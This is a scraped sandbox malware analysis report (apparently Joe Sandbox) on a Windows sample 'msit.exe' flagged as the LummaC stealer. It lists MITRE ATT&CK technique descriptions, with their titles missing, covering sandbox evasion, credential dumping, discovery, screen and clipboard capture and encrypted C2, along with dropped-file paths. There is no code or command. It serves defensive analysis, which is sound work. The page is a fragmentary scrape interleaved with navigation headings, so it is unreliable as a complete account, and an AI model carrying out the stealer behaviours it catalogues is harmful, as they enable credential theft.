Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report msit.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\599bb4.rbs

C:\Users\user\AppData\Local\Temp\MSI96A2.tmp

C:\Users\user\AppData\Local\Temp\MSI9720.tmp

C:\Users\user\AppData\Local\Temp\MSI9760.tmp

C:\Users\user\AppData\Local\Temp\MSI9790.tmp

C:\Users\user\AppData\Local\Temp\MSI97FE.tmp

C:\Users\user\AppData\Local\Temp\MSI982E.tmp

C:\Users\user\AppData\Local\Temp\MSI986D.tmp

C:\Users\user\AppData\Local\Temp\MSI98AD.tmp

C:\Users\user\AppData\Local\Temp\MSI98DD.tmp

C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp

C:\Users\user\AppData\Local\Temp\MSIA708.tmp

C:\Users\user\AppData\Local\Temp\TeleportPresets.txt

Windows Analysis Report
msit.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre